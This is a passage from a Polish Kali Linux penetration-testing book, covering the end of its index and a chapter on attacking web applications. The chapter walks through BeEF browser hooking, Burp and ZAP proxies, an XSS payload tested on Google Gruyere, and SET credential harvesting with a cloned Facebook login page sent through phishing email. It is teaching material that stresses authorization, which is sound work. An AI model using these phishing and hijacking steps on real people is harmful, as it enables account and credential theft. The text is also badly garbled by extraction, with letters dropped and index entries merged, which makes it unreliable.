usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method
Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania
Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y
W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
